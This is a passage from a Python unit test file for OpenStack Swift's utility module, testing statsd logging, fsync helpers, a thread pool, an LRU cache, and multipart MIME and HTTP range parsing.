self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
self.assertEqual('\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
@reset_logger_state
def test_thread_locals(self):
logger = utils.get_logger(None)
# test the setter
logger.thread_locals = ('id', 'ip')
self.assertEqual(logger.thread_locals, ('id', 'ip'))
# reset
logger.thread_locals = (None, None)
self.assertEqual(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEqual(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEqual(logger.thread_locals, ('5678', '5.6.7.8'))
def test_no_fdatasync(self):
called = []
class NoFdatasync(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync(object):
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEqual(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEqual(called, [12345])
class TestThreadPool(unittest.TestCase):
def setUp(self):
self.tp = None
def tearDown(self):
if self.tp:
self.tp.terminate()
def _pipe_count(self):
# Counts the number of pipes that this process owns.
fd_dir = "/proc/%d/fd" % os.getpid()
def is_pipe(path):
try:
stat_result = os.stat(path)
return stat.S_ISFIFO(stat_result.st_mode)
except OSError:
return False
return len([fd for fd in os.listdir(fd_dir)
if is_pipe(os.path.join(fd_dir, fd))])
def _thread_id(self):
return threading.current_thread().ident
def _capture_args(self, *args, **kwargs):
return {'args': args, 'kwargs': kwargs}
def _raise_valueerror(self):
return int('fishcakes')
def test_run_in_thread_with_threads(self):
tp = self.tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_with_threads(self):
# with nthreads > 0, force_run_in_thread looks just like run_in_thread
tp = self.tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.force_run_in_thread,
self._raise_valueerror)
def test_run_in_thread_without_threads(self):
# with zero threads, run_in_thread doesn't actually do so
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertEqual(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.run_in_thread,
self._raise_valueerror)
def test_force_run_in_thread_without_threads(self):
# with zero threads, force_run_in_thread uses eventlet.tpool
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.force_run_in_thread,
self._raise_valueerror)
def test_preserving_stack_trace_from_thread(self):
def gamma():
return 1 / 0 # ZeroDivisionError
def beta():
return gamma()
def alpha():
return beta()
tp = self.tp = utils.ThreadPool(1)
try:
tp.run_in_thread(alpha)
except ZeroDivisionError:
# NB: format is (filename, line number, function name, text)
tb_func = [elem[2] for elem
in traceback.extract_tb(sys.exc_info()[2])]
else:
self.fail("Expected ZeroDivisionError")
self.assertEqual(tb_func[-1], "gamma")
self.assertEqual(tb_func[-2], "beta")
self.assertEqual(tb_func[-3], "alpha")
# omit the middle; what's important is that the start and end are
# included, not the exact names of helper methods
self.assertEqual(tb_func[1], "run_in_thread")
self.assertEqual(tb_func[0], "test_preserving_stack_trace_from_thread")
def test_terminate(self):
initial_thread_count = threading.activeCount()
initial_pipe_count = self._pipe_count()
tp = utils.ThreadPool(4)
# do some work to ensure any lazy initialization happens
tp.run_in_thread(os.path.join, 'foo', 'bar')
tp.run_in_thread(os.path.join, 'baz', 'quux')
# 4 threads in the ThreadPool, plus one pipe for IPC; this also
# serves as a sanity check that we're actually allocating some
# resources to free later
self.assertEqual(initial_thread_count, threading.activeCount() - 4)
self.assertEqual(initial_pipe_count, self._pipe_count() - 2)
tp.terminate()
self.assertEqual(initial_thread_count, threading.activeCount())
self.assertEqual(initial_pipe_count, self._pipe_count())
def test_cant_run_after_terminate(self):
tp = utils.ThreadPool(0)
tp.terminate()
self.assertRaises(ThreadPoolDead, tp.run_in_thread, lambda: 1)
self.assertRaises(ThreadPoolDead, tp.force_run_in_thread, lambda: 1)
def test_double_terminate_doesnt_crash(self):
tp = utils.ThreadPool(0)
tp.terminate()
tp.terminate()
tp = utils.ThreadPool(1)
tp.terminate()
tp.terminate()
def test_terminate_no_threads_doesnt_crash(self):
tp = utils.ThreadPool(0)
tp.terminate()
class TestAuditLocationGenerator(unittest.TestCase):
def test_drive_tree_access(self):
orig_listdir = utils.listdir
def _mock_utils_listdir(path):
if 'bad_part' in path:
raise OSError(errno.EACCES)
elif 'bad_suffix' in path:
raise OSError(errno.EACCES)
elif 'bad_hash' in path:
raise OSError(errno.EACCES)
else:
return orig_listdir(path)
# Check Raise on Bad partition
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
obj_path = os.path.join(data, "bad_part")
with open(obj_path, "w"):
pass
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Suffix
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
obj_path = os.path.join(part1, "bad_suffix")
with open(obj_path, 'w'):
pass
suffix = os.path.join(part2, "suffix")
os.makedirs(suffix)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Hash
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
suffix = os.path.join(part1, "suffix")
os.makedirs(suffix)
hash1 = os.path.join(suffix, "hash1")
os.makedirs(hash1)
obj_path = os.path.join(suffix, "bad_hash")
with open(obj_path, 'w'):
pass
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
def test_non_dir_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
# Create a file, that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False
)
self.assertEqual(list(locations), [])
def test_mount_check_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
# Create a file, that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(2, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True
)
self.assertEqual(list(locations), [])
def test_non_dir_contents(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
with open(os.path.join(data, "partition1"), "w"):
pass
partition = os.path.join(data, "partition2")
os.makedirs(partition)
with open(os.path.join(partition, "suffix1"), "w"):
pass
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
with open(os.path.join(suffix, "hash1"), "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
def test_find_objects(self):
with temptree([]) as tmpdir:
expected_objs = list()
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
# Create a file, that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
partition = os.path.join(data, "partition1")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition1'))
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj2.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition2'))
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
got_objs = list(locations)
self.assertEqual(len(got_objs), len(expected_objs))
self.assertEqual(sorted(got_objs), sorted(expected_objs))
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
def test_ignore_metadata(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.dat")
with open(obj_path, "w"):
pass
meta_path = os.path.join(hash_path, "obj1.meta")
with open(meta_path, "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", ".dat", mount_check=False, logger=logger
)
self.assertEqual(list(locations),
[(obj_path, "drive", "partition2")])
class TestGreenAsyncPile(unittest.TestCase):
def test_runs_everything(self):
def run_test():
tests_ran[0] += 1
return tests_ran[0]
tests_ran = [0]
pile = utils.GreenAsyncPile(3)
for x in range(3):
pile.spawn(run_test)
self.assertEqual(sorted(x for x in pile), [1, 2, 3])
def test_is_asynchronous(self):
def run_test(index):
events[index].wait()
return index
pile = utils.GreenAsyncPile(3)
for order in ((1, 2, 0), (0, 1, 2), (2, 1, 0), (0, 2, 1)):
events = [eventlet.event.Event(), eventlet.event.Event(),
eventlet.event.Event()]
for x in range(3):
pile.spawn(run_test, x)
for x in order:
events[x].send()
self.assertEqual(next(pile), x)
def test_next_when_empty(self):
def run_test():
pass
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test)
self.assertEqual(next(pile), None)
self.assertRaises(StopIteration, lambda: next(pile))
def test_waitall_timeout_timesout(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 1.0)
self.assertEqual(pile.waitall(0.5), [0.1])
self.assertEqual(completed[0], 1)
def test_waitall_timeout_completes(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 0.1)
self.assertEqual(pile.waitall(0.5), [0.1, 0.1])
self.assertEqual(completed[0], 2)
def test_pending(self):
pile = utils.GreenAsyncPile(3)
self.assertEqual(0, pile._pending)
for repeats in range(2):
# repeat to verify that pending will go again up after going down
for i in range(4):
pile.spawn(lambda: i)
self.assertEqual(4, pile._pending)
for i in range(3, -1, -1):
next(pile)
self.assertEqual(i, pile._pending)
# sanity check - the pile is empty
self.assertRaises(StopIteration, pile.next)
# pending remains 0
self.assertEqual(0, pile._pending)
class TestLRUCache(unittest.TestCase):
def test_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
_orig_math_sqrt = math.sqrt
# setup cache [0-10)
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# update cache [10-20)
for i in range(10, 20):
self.assertEqual(math.sqrt(i), f(i))
# cache size is fixed
self.assertEqual(f.size(), 10)
# validate cache [10-20)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
for i in range(10):
self.assertRaises(TypeError, f, i)
# cache unchanged
self.assertEqual(f.size(), 10)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
def test_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
_orig_math_sqrt = math.sqrt
now = time.time()
the_future = now + 31
# setup cache [0-10)
with patch('time.time', lambda: now):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate expired [0-10)
with patch('math.sqrt', new=None):
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertRaises(TypeError, f, i)
# validate repopulates [0-10)
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
# reuses cache space
self.assertEqual(f.size(), 10)
def test_set_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
self.assertEqual(2, f(4))
self.assertEqual(1, f.size())
# expire everything
f.maxtime = -1
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
self.assertRaises(TypeError, f, 4)
def test_set_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
for i in range(12):
f(i)
self.assertEqual(f.size(), 10)
f.maxsize = 4
for i in range(12):
f(i)
self.assertEqual(f.size(), 4)
class TestParseContentRange(unittest.TestCase):
def test_good(self):
start, end, total = utils.parse_content_range("bytes 100-200/300")
self.assertEqual(start, 100)
self.assertEqual(end, 200)
self.assertEqual(total, 300)
def test_bad(self):
self.assertRaises(ValueError, utils.parse_content_range,
"100-300/500")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes 100-200/aardvark")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes bulbous-bouffant/4994801")
class TestParseContentDisposition(unittest.TestCase):
def test_basic_content_type(self):
name, attrs = utils.parse_content_disposition('text/plain')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {})
def test_content_type_with_charset(self):
name, attrs = utils.parse_content_disposition(
'text/plain; charset=UTF8')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {'charset': 'UTF8'})
def test_content_disposition(self):
name, attrs = utils.parse_content_disposition(
'form-data; name="somefile"; filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
def test_content_disposition_without_white_space(self):
name, attrs = utils.parse_content_disposition(
'form-data;name="somefile";filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
class TestIterMultipartMimeDocuments(unittest.TestCase):
def test_bad_start(self):
it = utils.iter_multipart_mime_documents(StringIO('blah'), 'unique')
exc = None
try:
next(it)
except MimeInvalid as err:
exc = err
self.assertTrue('invalid starting boundary' in str(exc))
self.assertTrue('--unique' in str(exc))
def test_empty(self):
it = utils.iter_multipart_mime_documents(StringIO('--unique'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), '')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic2(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_tiny_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(2), 'ab')
self.assertEqual(fp.read(2), 'cd')
self.assertEqual(fp.read(2), 'ef')
self.assertEqual(fp.read(2), 'g')
self.assertEqual(fp.read(2), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_big_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_leading_crlfs(self):
it = utils.iter_multipart_mime_documents(
StringIO('\r\n\r\n\r\n--unique\r\nabcdefg\r\n'
'--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
self.assertRaises(StopIteration, it.next)
def test_broken_mid_stream(self):
# We go ahead and accept whatever is sent instead of rejecting the
# whole request, in case the partial form is still useful.
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabc'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abc')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n\r\n'
'jkl\r\n\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline_with_tiny_chunks(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n'
'\r\njkl\r\n\r\n--unique--'),
'unique',
read_chunk_size=2)
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
class TestParseMimeHeaders(unittest.TestCase):
def test_parse_mime_headers(self):
doc_file = BytesIO(b"""Content-Disposition: form-data; name="file_size"
Foo: Bar
NOT-title-cAsED: quux
Connexion: =?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=
Status: =?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=
Latin-1: Resincronizaci\xf3n realizada con \xe9xito
Utf-8: \xd0\xba\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5\xd0\xb9\xd0\xbd\xd0\xb5\xd1\x80
This is the body
""")
headers = utils.parse_mime_headers(doc_file)
expected_headers = {
'Content-Disposition': 'form-data; name="file_size"',
'Foo': "Bar",
'Not-Title-Cased': "quux",
# Encoded-word or non-ASCII values are treated just like any other
# bytestring (at least for now)
'Connexion': "=?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=",
'Status': "=?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=",
'Latin-1': "Resincronizaci\xf3n realizada con \xe9xito",
'Utf-8': ("\xd0\xba\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5\xd0\xb9\xd0"
"\xbd\xd0\xb5\xd1\x80")
}
self.assertEqual(expected_headers, headers)
self.assertEqual(b"This is the body\n", doc_file.read())
class FakeResponse(object):
def __init__(self, status, headers, body):
self.status = status
self.headers = HeaderKeyDict(headers)
self.body = StringIO(body)
def getheader(self, header_name):
return str(self.headers.get(header_name, ''))
def getheaders(self):
return self.headers.items()
def read(self, length=None):
return self.body.read(length)
def readline(self, length=None):
return self.body.readline(length)
class TestHTTPResponseToDocumentIters(unittest.TestCase):
def test_200(self):
fr = FakeResponse(
200,
{'Content-Length': '10', 'Content-Type': 'application/lunch'},
'sandwiches')
doc_iters = utils.http_response_to_document_iters(fr)
first_byte, last_byte, length, headers, body = next(doc_iters)
self.assertEqual(first_byte, 0)
self.assertEqual(last_byte, 9)
self.assertEqual(length, 10)
header_dict = HeaderKeyDict(headers)
self.assertEqual(header_dict.get('Content-Length'), '10')
self.assertEqual(header_dict.get('Content-Type'), 'application/lunch')
self.assertEqual(body.read(), 'sandwiches')
self.assertRaises(StopIteration, next, doc_iters)
def test_206_single_range(self):
fr = FakeResponse(
206,
{'Content-Length': '8', 'Content-Type': 'application/lunch',
'Content-Range': 'bytes 1-8/10'},
'andwiche')
doc_iters = utils.http_response_to_document_iters(fr)
first_byte, last_byte, length, headers, body = next(doc_iters)
self.assertEqual(first_byte, 1)
self.assertEqual(last_byte, 8)
self.assertEqual(length, 10)
header_dict = HeaderKeyDict(headers)
self.assertEqual(header_dict.get('Content-Length'), '8')
self.assertEqual(header_dict.get('Content-Type'), 'application/lunch')
self.assertEqual(body.read(), 'andwiche')
self.assertRaises(StopIteration, next, doc_iters)
def test_206_multiple_ranges(self):
fr = FakeResponse(
206,
{'Content-Type': 'multipart/byteranges; boundary=asdfasdfasdf'},
("--asdfasdfasdf\r\n"
"Content-Type: application/lunch\r\n"
"Content-Range: bytes 0-3/10\r\n"
"\r\n"
"sand\r\n"
"--asdfasdfasdf\r\n"
"Content-Type: application/lunch\r\n"
"Content-Range: bytes 6-9/10\r\n"
"\r\n"
"ches\r\n"
"--asdfasdfasdf--"))
doc_iters = utils.http_response_to_document_iters(fr)
first_byte, last_byte, length, headers, body = next(doc_iters)
self.assertEqual(first_byte, 0)
self.assertEqual(last_byte, 3)
self.assertEqual(length, 10)
header_dict = HeaderKeyDict(headers)
self.assertEqual(header_dict.get('Content-Type'), 'application/lunch')
self.assertEqual(body.read(), 'sand')
first_byte, last_byte, length, headers, body = next(doc_iters)
self.assertEqual(first_byte, 6)
self.assertEqual(last_byte, 9)
self.assertEqual(length, 10)
header_dict = HeaderKeyDict(headers)
self.assertEqual(header_dict.get('Content-Type'), 'application/lunch')
self.assertEqual(body.read(), 'ches')
self.assertRaises(StopIteration, next, doc_iters)
class TestDocumentItersToHTTPResponseBody(unittest.TestCase):
def test_no_parts(self):
body = utils.document_iters_to_http_response_body(
iter([]), 'dontcare',
multipart=False, logger=FakeLogger())
self.assertEqual(body, '')
def test_single_part(self):
body = "time flies like an arrow; fruit flies like a banana"
doc_iters = [{'part_iter': iter(StringIO(body).read, '')}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'dontcare',
multipart=False, logger=FakeLogger()))
self.assertEqual(resp_body, body)
def test_multiple_parts(self):
part1 = "two peanuts were walking down a railroad track"
part2 = "and one was a salted. ... peanut."
doc_iters = [{
'start_byte': 88,
'end_byte': 133,
'content_type': 'application/peanut',
'entity_length': 1024,
'part_iter': iter(StringIO(part1).read, ''),
}, {
'start_byte': 500,
'end_byte': 532,
'content_type': 'application/salted',
'entity_length': 1024,
'part_iter': iter(StringIO(part2).read, ''),
}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'boundaryboundary',
multipart=True, logger=FakeLogger()))
self.assertEqual(resp_body, (
"--boundaryboundary\r\n" +
# This is a little too strict; we don't actually care that the
# headers are in this order, but the test is much more legible
# this way.
"Content-Type: application/peanut\r\n" +
"Content-Range: bytes 88-133/1024\r\n" +
"\r\n" +
part1 + "\r\n" +
"--boundaryboundary\r\n"
"Content-Type: application/salted\r\n" +
"Content-Range: bytes 500-532/1024\r\n" +
"\r\n" +
part2 + "\r\n" +
"--boundaryboundary--"))
class TestPairs(unittest.TestCase):
def test_pairs(self):
items = [10, 20, 30, 40, 50, 60]
got_pairs = set(utils.pairs(items))
self.assertEqual(got_pairs,
set([(10, 20), (10, 30), (10, 40), (10, 50), (10, 60),
(20, 30), (20, 40), (20, 50), (20, 60),
(30, 40), (30, 50), (30, 60),
(40, 50), (40, 60),
(50, 60)]))
if __name__ == '__main__':
unittest.main()
|
